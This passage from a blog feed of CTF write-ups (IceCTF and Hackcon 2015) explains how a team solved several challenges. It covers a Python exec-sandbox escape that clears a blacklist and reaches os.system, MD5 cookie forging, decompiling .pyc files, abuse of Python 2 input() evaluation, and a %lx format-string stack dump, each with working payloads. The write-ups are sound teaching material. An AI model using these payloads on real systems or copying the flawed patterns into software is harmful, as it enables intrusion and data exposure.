class="n">__dict__</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="k">while</span> <span class="mi">1</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">"&gt;&gt;&gt;"</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">' '</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="n">data</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">()</span> <span class="k">for</span> <span class="n">no</span> <span class="ow">in</span> <span class="n">banned</span><span class="p">:</span> <span class="k">if</span> <span class="n">no</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="n">data</span><span class="p">.</span><span class="n">lower</span><span class="p">():</span> <span class="k">print</span><span class="p">(</span><span class="s">"No bueno"</span><span class="p">)</span> <span class="k">break</span> <span class="k">else</span><span class="p">:</span> <span class="k">exec</span> <span class="n">data</span></code></pre></figure> <p>So we are provided with a shell and the user input is checked not to contain one of the <em>banned</em> words before being passed to the <a href="https://docs.python.org/2/reference/simple_stmts.html#exec"><code class="language-plaintext highlighter-rouge">exec</code></a> function which dynamically execute the code.</p> <p>In order to increase the shell security, every element but <code class="language-plaintext highlighter-rouge">print</code> and <code class="language-plaintext highlighter-rouge">raw_input</code> is removed from the <a href="https://docs.python.org/2/reference/executionmodel.html"><code class="language-plaintext highlighter-rouge">__builtins__</code></a> dictionary which contains the common functions.</p> <h2 id="background">Background</h2> <p>This reminds us the <em>CSAW2014</em> problem <a href="https://github.com/ctfs/write-ups-2014/tree/master/csaw-ctf-2014/pybabbies"><em>pybabbies</em></a> and its solutions can be adapted to this task. There are a few write-ups for that task, but we can groups them in two categories:</p> <ul> <li>obtain a reference to the <a href="https://docs.python.org/2/library/functions.html#file"><code class="language-plaintext highlighter-rouge">file</code></a> function and guess the filename for the flag;</li> <li>obtain a reference to the <a href="https://docs.python.org/2/library/os.html"><code class="language-plaintext highlighter-rouge">os</code></a> module in order to use the <a href="https://docs.python.org/2/library/os.html#os.system"><code class="language-plaintext highlighter-rouge">os.system</code></a> function and be able to issue commands to the underlying system.</li> </ul> <p>The second way is more interesting, but even if the methods used to gain the reference to the <code class="language-plaintext highlighter-rouge">os</code> module are really interesting, they are quite complicated such as <a href="https://hexplo.it/escaping-the-csawctf-python-sandbox/">this</a> and <a href="http://sugarstack.io/csaw-2014-pybabbies.html">this</a>. Most of them are based on <code class="language-plaintext highlighter-rouge">linecache</code>, contained in <code class="language-plaintext highlighter-rouge">warnings.catch_warnings</code>, which contains a reference to <code class="language-plaintext highlighter-rouge">os</code> united with some techniques explained in <a href="http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html">this</a> amazing Ned Batchelder’s post.</p> <h2 id="another-solution">Another solution</h2> <p>We found a more straightforward solution for this task. Since in this case the <a href="https://docs.python.org/2/library/sys.html"><code class="language-plaintext highlighter-rouge">sys</code></a> module is already loaded, we can use <a href="https://docs.python.org/2/library/sys.html#sys.modules"><code class="language-plaintext highlighter-rouge">sys.modules</code></a> to get the references of all the loaded modules (including <code class="language-plaintext highlighter-rouge">os</code>).</p> <p>The problem here is that <code class="language-plaintext highlighter-rouge">sys</code> is a banned word. We want to clear the <code class="language-plaintext highlighter-rouge">banned</code> variable, without being able to use its name. It would be great if there was a dictionary containing all the globals so that we can compose the name of the variable with string operations like <code class="language-plaintext highlighter-rouge">'ban' + 'ned'</code> and evade the blacklist.</p> <p>The dictionary that contains the global variables can be accessed with the function <a href="https://docs.python.org/2/library/functions.html#globals"><code class="language-plaintext highlighter-rouge">globals()</code></a>, but unfortunately we don’t have access to that variable since the built-ins were cleared.</p> <p>We can access the same dictionary defining a <code class="language-plaintext highlighter-rouge">function</code> object (for example using a <code class="language-plaintext highlighter-rouge">lambda</code>) and accessing its <code class="language-plaintext highlighter-rouge">__globals__</code> variable. This way we will be able to set the <code class="language-plaintext highlighter-rouge">banned</code> variable to an empty list, disabling the blacklist:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="p">(</span><span class="k">lambda</span><span class="p">:</span> <span class="mi">1</span><span class="p">).</span><span class="n">__globals__</span><span class="p">[</span><span class="s">'ban'</span> <span class="o">+</span> <span class="s">'ned'</span><span class="p">]</span> <span class="o">=</span> <span class="p">[]</span></code></pre></figure> <p>Now we don’t have a blacklist anymore, so we can easily get a reference to <code class="language-plaintext highlighter-rouge">os</code>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="n">os</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">modules</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span></code></pre></figure> <p>Now we can list the files in the directory and print the flag:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">'ls'</span><span class="p">)</span> <span class="n">flag</span><span class="p">.</span><span class="n">txt</span> <span class="n">problem</span> <span class="n">problem</span><span class="p">.</span><span class="n">py</span> <span class="o">&gt;&gt;&gt;</span> <span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">'cat ./flag.txt'</span><span class="p">)</span> <span class="n">The</span> <span class="n">flag</span> <span class="ow">is</span><span class="p">:</span> <span class="n">not_your_average_python</span></code></pre></figure> <p>So the flag is <code class="language-plaintext highlighter-rouge">not_your_average_python</code>.</p> Mon, 24 Aug 2015 00:00:00 +0000 http://vimvaders.github.io/icectf2015/2015/08/24/pyshell.html http://vimvaders.github.io/icectf2015/2015/08/24/pyshell.html ctf exploitation python icectf2015 Hackcon 2015: Doctor Doctor <blockquote> <p>Category: <em>web</em> - Points: <em>25</em></p> <p>Description: <em>Flag is <a href="http://hackcon.in:8080/level8/">here</a></em></p> </blockquote> <p>When we visit the flag <a href="http://hackcon.in:8080/level8/">website</a> we are greeted with a login form:</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/level8-login.png" alt="login form" /></p> <p>No hints in the source code and everything we try to insert in the form leads miserably to this page (again without hints in the source code):</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/you-chose-poorly.png" alt="message 'you chose poorly' showed after login attempt" /></p> <p>Before embarking on SQLI, we realized that the data inserted in the form is not even submitted to the action page, so there must be something else. Let’s check the cookies:</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/cookies.png" alt="the page sets two cookies, MadHatter? and MockTurtle?" /></p> <p>the page sets two cookies, <code class="language-plaintext highlighter-rouge">MadHatter?</code> and <code class="language-plaintext highlighter-rouge">MockTurtle?</code> which are both characters from <em>Alice in wonderland</em>. Both the cookies contains the same data:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>7fa3b767c460b54a2be4d49030b349c7 </code></pre></div></div> <p>A search on Google <a href="http://md5cracker.org/decrypted-md5-hash/7fa3b767c460b54a2be4d49030b349c7">showed</a> that the string is just the MD5 of <code class="language-plaintext highlighter-rouge">no</code>. So for the next hour we tried to replace the value of the cookies with other MD5 hashes for <code class="language-plaintext highlighter-rouge">yes</code>, <code class="language-plaintext highlighter-rouge">maybe</code>, <code class="language-plaintext highlighter-rouge">ofcourse</code>, <code class="language-plaintext highlighter-rouge">yeah</code> and many other (obviously including insults).</p> <p>Just before going insane we decided to explore the webservice a bit more. We figured that the content of the <a href="http://hackcon.in:8080/level8/robots.txt">robots.txt</a> file was:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User-agent: * Disallow: /what_is_this_place </code></pre></div></div> <p>So we checked the page at <a href="http://hackcon.in:8080/level8/what_is_this_place">http://hackcon.in:8080/level8/what_is_this_place</a>:</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/what_is_this_place.png" alt="content of the page what_is_this_place showing four files" /></p> <p>All the files contain some non-interesting words. We started looking at the file having the name of the first of our two cookies, <code class="language-plaintext highlighter-rouge">MadHatter</code>, which contained:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sternutate </code></pre></div></div> <p>Setting the value of the cookie <code class="language-plaintext highlighter-rouge">MadHatter?</code> to the MD5 of the word <code class="language-plaintext highlighter-rouge">sternutate</code> (<code class="language-plaintext highlighter-rouge">27a297c35cf0e6930faec429512e2490</code>) and attempting to login results in:</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/madhatter.png" alt="MadHatter login" /></p> <p>So we checked the content of <code class="language-plaintext highlighter-rouge">MockTurtle</code>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>borborygmi </code></pre></div></div> <p>Restoring the value of the cookie <code class="language-plaintext highlighter-rouge">MadHatter?</code> to its original value and setting the value of the cookie <code class="language-plaintext highlighter-rouge">MockTurtle?</code> to the MD5 of the word <code class="language-plaintext highlighter-rouge">borborygmi</code> (<code class="language-plaintext highlighter-rouge">27a297c35cf0e6930faec429512e2490</code>) and attempting to login results in:</p> <p><img src="http://vimvaders.github.io/assets/hackcon2015/mockturtle.png" alt="MockTurtle login" /></p> <p>So our flag is <code class="language-plaintext highlighter-rouge">0901368cc95e06c6067da0ac24c69de2</code> (which is actually the MD5 of <code class="language-plaintext highlighter-rouge">jabbajabba</code>).</p> Thu, 20 Aug 2015 22:00:00 +0000 http://vimvaders.github.io/hackcon2015/2015/08/20/doctor-doctor.html http://vimvaders.github.io/hackcon2015/2015/08/20/doctor-doctor.html ctf web hackcon2015 Hackcon 2015: Pythonista <blockquote> <p>Category: <em>pwn</em> - Points: <em>25</em></p> <p>Description: <em>The program apparently once could print more than stories.</em></p> </blockquote> <p>The task comes with two files:</p> <ul> <li><a href="http://vimvaders.github.io/assets/hackcon2015/hide.pyo"><code class="language-plaintext highlighter-rouge">hide.pyo</code></a></li> <li><a href="http://vimvaders.github.io/assets/hackcon2015/message.txt"><code class="language-plaintext highlighter-rouge">message.txt</code></a></li> </ul> <p>The file <a href="http://vimvaders.github.io/assets/hackcon2015/message.txt"><code class="language-plaintext highlighter-rouge">message.txt</code></a> seems to contain a <em>base64</em> string, but when decoding it, we receive another <em>base64</em> string. Let’s check the other file to understand what is going on.</p> <p>The file <a href="http://vimvaders.github.io/assets/hackcon2015/hide.pyo"><code class="language-plaintext highlighter-rouge">hide.pyo</code></a> is a compiled python object file. We can decompile it using the <a href="https://pypi.python.org/pypi/uncompyle2"><code class="language-plaintext highlighter-rouge">uncompyle2</code></a> package.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ uncompyle2 --py -o . hide.pyo +++ okay decompyling hide.pyo # decompiled 1 files: 1 okay, 0 failed, 0 verify failed </code></pre></div></div> <p>So we can now check the content of <a href="http://vimvaders.github.io/assets/hackcon2015/hide.py"><code class="language-plaintext highlighter-rouge">hide.py</code></a>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">random</span> <span class="n">MESSAGE</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'MESSAGE'</span><span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="il">18446744073709551616L</span> <span class="n">r</span> <span class="o">=</span> <span class="mi">29</span> <span class="n">y</span> <span class="o">=</span> <span class="p">[</span> <span class="ow">not</span> <span class="nb">bool</span><span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">r</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="p">]</span> <span class="n">algorithm</span> <span class="o">=</span> <span class="p">[</span><span class="s">'bz2'</span><span class="p">,</span> <span class="s">'base64'</span><span class="p">,</span> <span class="s">'uu'</span><span class="p">,</span> <span class="s">'quopri'</span><span class="p">,</span> <span class="s">'zlib'</span><span class="p">][</span><span class="nb">int</span><span class="p">(</span><span class="n">y</span><span class="p">[</span><span class="mi">0</span><span class="p">])]</span> <span class="n">final_strength</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="k">def</span> <span class="nf">_encode</span><span class="p">(</span><span class="n">message</span><span class="p">,</span> <span class="n">rounds</span><span class="p">,</span> <span class="n">strength</span><span class="p">,</span> <span class="n">encoding</span><span class="p">):</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">strength</span><span class="p">):</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">rounds</span><span class="p">):</span> <span class="n">message</span> <span class="o">=</span> <span class="n">message</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">encoding</span><span class="p">)</span> <span class="k">return</span> <span class="n">message</span> <span class="n">encoded</span> <span class="o">=</span> <span class="n">_encode</span><span class="p">(</span><span class="n">MESSAGE</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">final_strength</span><span class="p">,</span> <span class="n">algorithm</span><span class="p">)</span> <span class="k">print</span> <span class="n">encoded</span></code></pre></figure> <p>We add some comment in order to understand what is going on:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">random</span> <span class="c1"># get the MESSAGE from the environment variable MESSAGE </span><span class="n">MESSAGE</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'MESSAGE'</span><span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="il">18446744073709551616L</span> <span class="n">r</span> <span class="o">=</span> <span class="mi">29</span> <span class="n">y</span> <span class="o">=</span> <span class="p">[</span> <span class="ow">not</span> <span class="nb">bool</span><span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">r</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="p">]</span> <span class="c1"># = [1, 0] </span><span class="n">algorithm</span> <span class="o">=</span> <span class="p">[</span><span class="s">'bz2'</span><span class="p">,</span> <span class="s">'base64'</span><span class="p">,</span> <span class="s">'uu'</span><span class="p">,</span> <span class="s">'quopri'</span><span class="p">,</span> <span class="s">'zlib'</span><span class="p">][</span><span class="nb">int</span><span class="p">(</span><span class="n">y</span><span class="p">[</span><span class="mi">0</span><span class="p">])]</span> <span class="c1"># since y[0] = 1, algorithm = 'base64' </span> <span class="c1"># we can not know which random number was chosen here at runtime </span><span class="n">final_strength</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="c1"># for a number of times rounds*strength, # replace message with its encoding (nested encoding) </span><span class="k">def</span> <span class="nf">_encode</span><span class="p">(</span><span class="n">message</span><span class="p">,</span> <span class="n">rounds</span><span class="p">,</span> <span class="n">strength</span><span class="p">,</span> <span class="n">encoding</span><span class="p">):</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">strength</span><span class="p">):</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">rounds</span><span class="p">):</span> <span class="n">message</span> <span class="o">=</span> <span class="n">message</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">encoding</span><span class="p">)</span> <span class="k">return</span> <span class="n">message</span> <span class="c1"># encode MESSAGE with 29 * final_strength passes of base64 </span><span class="n">encoded</span> <span class="o">=</span> <span class="n">_encode</span><span class="p">(</span><span class="n">MESSAGE</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">final_strength</span><span class="p">,</span> <span class="n">algorithm</span><span class="p">)</span> <span class="k">print</span> <span class="n">encoded</span></code></pre></figure> <p>So we are dealing with multiple passes of base64. The easiest way is to read the file <code class="language-plaintext highlighter-rouge">message.txt</code> and iterate a base64 decoding, until an exception is raised (meaning that the string is no longer in base64, so it is the original string).</p> <p>We created <a href="http://vimvaders.github.io/assets/hackcon2015/decode.py">this python script</a> in order to do that:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">decode</span><span class="p">(</span><span class="n">message</span><span class="p">):</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">message</span> <span class="o">=</span> <span class="n">message</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'base64'</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="k">return</span> <span class="n">message</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'message.txt'</span><span class="p">)</span> <span class="k">as</span> <span class="n">m</span><span class="p">:</span> <span class="k">print</span> <span class="n">decode</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">read</span><span class="p">())</span></code></pre></figure> <p>The result is the following string: <a href="https://xkcd.com/936/"><code class="language-plaintext highlighter-rouge">https://xkcd.com/936/</code></a>, which is:</p> <p><img src="http://imgs.xkcd.com/comics/password_strength.png" alt="password strength" /></p> <p>So we tried the super-famous <code class="language-plaintext highlighter-rouge">correcthorsebatterystaple</code> as the flag but it didn’t work. The other one was <code class="language-plaintext highlighter-rouge">Tr0ub4dor&amp;3</code> and it worked, so this is our flag.</p> Thu, 20 Aug 2015 21:00:00 +0000 http://vimvaders.github.io/hackcon2015/2015/08/20/pythonista.html http://vimvaders.github.io/hackcon2015/2015/08/20/pythonista.html ctf pwn hackcon2015 Hackcon 2015: Making Love To Bugs <blockquote> <p>Category: <em>pwn</em> - Points: <em>25</em></p> <p>Description: <em>Get your flag <a href="http://vimvaders.github.io/assets/hackcon2015/ilovebugs.pyc">here</a>.</em></p> </blockquote> <p>The task comes with the file <a href="http://vimvaders.github.io/assets/hackcon2015/ilovebugs.pyc">ilovebugs.pyc</a> which is a compiled python file. We can decompile it using the <a href="https://pypi.python.org/pypi/uncompyle2"><code class="language-plaintext highlighter-rouge">uncompyle2</code></a> package.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ uncompyle2 --py -o . ilovebugs.pyc +++ okay decompyling ilovebugs.pyc # decompiled 1 files: 1 okay, 0 failed, 0 verify failed </code></pre></div></div> <p>So we can now check the content of <a href="http://vimvaders.github.io/assets/hackcon2015/ilovebugs.py"><code class="language-plaintext highlighter-rouge">ilovebugs.py</code></a>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">sys</span> <span class="n">users</span> <span class="o">=</span> <span class="p">{</span><span class="s">'admin'</span><span class="p">:</span> <span class="s">'&lt;REDACTED&gt;'</span><span class="p">}</span> <span class="k">def</span> <span class="nf">register</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">users</span><span class="p">:</span> <span class="k">return</span> <span class="s">'User already exits.'</span> <span class="n">users</span><span class="p">[</span><span class="n">username</span><span class="p">]</span> <span class="o">=</span> <span class="n">password</span> <span class="k">return</span> <span class="s">'Registered Successfully.'</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="k">if</span> <span class="n">username</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">users</span><span class="p">:</span> <span class="k">return</span> <span class="s">'Wrong pin/password'</span> <span class="k">if</span> <span class="n">password</span> <span class="o">!=</span> <span class="n">users</span><span class="p">[</span><span class="n">username</span><span class="p">]:</span> <span class="k">return</span> <span class="s">'Wrong pin/password'</span> <span class="k">if</span> <span class="n">username</span> <span class="o">==</span> <span class="s">'admin'</span><span class="p">:</span> <span class="k">return</span> <span class="s">'The FLAG is what you entered in the "Pin" field to get here!'</span> <span class="k">return</span> <span class="s">'You must login as admin to get the flag'</span> <span class="k">def</span> <span class="nf">handle_command</span><span class="p">(</span><span class="n">command</span><span class="p">):</span> <span class="k">if</span> <span class="n">command</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">(</span><span class="s">'REG'</span><span class="p">,</span> <span class="s">'LOGIN'</span><span class="p">):</span> <span class="k">return</span> <span class="s">'Invalid Command!'</span> <span class="k">print</span> <span class="s">'Username:'</span><span class="p">,</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="n">username</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">()</span> <span class="k">try</span><span class="p">:</span> <span class="k">print</span> <span class="s">'Pin ([0-9]+):'</span><span class="p">,</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="n">password</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span> <span class="k">except</span><span class="p">:</span> <span class="k">return</span> <span class="s">'Please enter a valid password. Pin can only contain digits.'</span> <span class="k">if</span> <span class="n">command</span> <span class="o">==</span> <span class="s">'REG'</span><span class="p">:</span> <span class="k">return</span> <span class="n">register</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span> <span class="k">if</span> <span class="n">command</span> <span class="o">==</span> <span class="s">'LOGIN'</span><span class="p">:</span> <span class="k">return</span> <span class="n">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="k">print</span> <span class="s">'Hey welcome to the admin panel'</span> <span class="k">print</span> <span class="s">'Commands: REG, LOGIN'</span> <span class="k">try</span><span class="p">:</span> <span class="k">print</span> <span class="s">'&gt;'</span><span class="p">,</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="n">command</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">()</span> <span class="k">print</span> <span class="n">handle_command</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="k">except</span><span class="p">:</span> <span class="k">pass</span></code></pre></figure> <p>The PIN should be in the form <code class="language-plaintext highlighter-rouge">[0-9]+</code> and in order to enforce that the <code class="language-plaintext highlighter-rouge">input</code> function is used. By the way, in python 2.x the <code class="language-plaintext highlighter-rouge">input</code> function <strong>evaluates</strong> the input. Since the admin password can be retrieved as <code class="language-plaintext highlighter-rouge">users['admin']</code>, when we pass that exact string as PIN, python evaluates it for us, and stores the correct admin password in the <code class="language-plaintext highlighter-rouge">password</code> variable, allowing the login.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python ilovebugs.py Hey welcome to the admin panel Commands: REG, LOGIN &gt; LOGIN Username: admin Pin ([0-9]+): users['admin'] The FLAG is what you entered in the "Pin" field to get here! </code></pre></div></div> <p>So the flag is <code class="language-plaintext highlighter-rouge">users['admin']</code>.</p> Thu, 20 Aug 2015 20:00:00 +0000 http://vimvaders.github.io/hackcon2015/2015/08/20/making-love-to-bugs.html http://vimvaders.github.io/hackcon2015/2015/08/20/making-love-to-bugs.html ctf pwn hackcon2015 Hackcon 2015: Did you mean <blockquote> <p>Category: <em>pwn</em> - Points: <em>50</em></p> <p>Description: <em>Pwnie</em></p> </blockquote> <p>The task provides us with the file <a href="http://vimvaders.github.io/assets/hackcon2015/pwnie"><code class="language-plaintext highlighter-rouge">pwnie</code></a> and an ip and address for a webservice.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ file pwnie pwnie: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=b87bef02278df740b6c0011e989f39b08ccfc998, not stripped </code></pre></div></div> <p>Let’s try to run it:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./pwnie No! </code></pre></div></div> <p>Ok, sorry. Let’s check the output of <code class="language-plaintext highlighter-rouge">strings</code>. The only interesting ones are:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag.txt The flag's right! Did you say: </code></pre></div></div> <p>So it seems that the file <code class="language-plaintext highlighter-rouge">flag.txt</code> is involved. Let’s create it with content: <code class="language-plaintext highlighter-rouge">ABCDEFGHIJKLMNOP</code> and run the program again. Now the program waits for our input and if we put again <code class="language-plaintext highlighter-rouge">ABCDEFGHIJKLMOP</code> this happens:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./pwnie ABCDEFGHIJKLMNOP The flag's right! </code></pre></div></div> <p>Ok, we have to produce some interesting payload, let’s start IDA and decompile the <code class="language-plaintext highlighter-rouge">main</code>. We also added some comment in the code to highlight the important parts.</p> <figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">...</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="p">)</span> <span class="p">{</span> <span class="n">fgets</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v7</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span> <span class="c1">// v7 is the content of v3 (flag.txt)</span> <span class="n">fgets</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// s is the string from the stdin</span> <span class="n">v4</span> <span class="o">=</span> <span class="n">strncmp</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v7</span><span class="p">,</span> <span class="mh">0xAuLL</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v4</span> <span class="p">)</span> <span class="c1">// if they do not match</span> <span class="p">{</span> <span class="n">v4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Did you say: "</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span> <span class="n">__printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="c1">// print the user input</span> <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"The flag's right!"</span><span class="p">);</span> <span class="c1">// the flag is correct</span> <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="c1">// the file does not exist</span> <span class="p">{</span> <span class="n">v4</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">puts</span><span class="p">(</span><span class="s">"No!"</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span> <span class="p">}</span> <span class="n">v5</span> <span class="o">=</span> <span class="o">*</span><span class="n">MK_FP</span><span class="p">(</span><span class="n">__FS__</span><span class="p">,</span> <span class="mi">40LL</span><span class="p">)</span> <span class="o">^</span> <span class="n">v9</span><span class="p">;</span> <span class="k">return</span> <span class="n">v4</span><span class="p">;</span> <span class="err">}</span></code></pre></figure> <p>There is a <em>string format exploit</em> in the line:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__printf_chk(1LL, &amp;s); </code></pre></div></div> <p>The user input is treated as format string. So we can exploit this to dump the stack and get our flag. Since the program is in 64 bits we need to use the placeholder <code class="language-plaintext highlighter-rouge">%lx</code> to print a whole memory block. The <code class="language-plaintext highlighter-rouge">fgets</code> is told to copy 100 bytes, so we can join 33 times <code class="language-plaintext highlighter-rouge">%lx</code> in order to get more data from the stack.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./pwnie %lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx%lx </code></pre></div></div> <p>The output is:</p> <blockquote> <p>07f7ef00e68707f7ef05c374004847464544434241504f4e4d4c4b4a49a00007f7ef05e45207fff414a69807fff414a6970f63d4e2e40043625786c25ffffffff786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c25786c25786c257839cc7d2e1411990007f7ef001cec50</p> </blockquote> <p>We can easily spot the part that holds the content of the file stored in little endian:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4847464544434241504f4e4d4c4b4a49 </code></pre></div></div> <p>So the interesting part comes after 